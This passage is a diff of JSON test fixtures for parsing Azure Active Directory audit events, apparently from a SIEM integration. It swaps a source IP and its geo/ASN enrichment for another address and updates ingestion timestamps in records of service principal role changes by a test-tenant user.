incipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -9445,25 +8635,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9477,7 +8649,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -9613,7 +8785,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -9625,12 +8797,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036370100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125100400Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735126\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a385881d-d5e8-47b0-83ea-d50d6c9906e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -9656,25 +8828,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -9688,7 +8842,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -9824,7 +8978,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -9836,12 +8990,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036374300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR519\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"227bc85c-0c21-4df3-9e11-3a24f104e1e4\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125107100Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2f79971d-1802-40d2-b048-6cf4f85c010b\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:45.3474390Z\"},{\"Name\":\"env_epoch\",\"Value\":\"95CEL\"},{\"Name\":\"env_seqNum\",\"Value\":\"44735117\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##7680db8f-eddb-4082-952a-0a3cfafd117c_00000000-0000-0000-0000-000000000000_7680db8f-eddb-4082-952a-0a3cfafd117c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-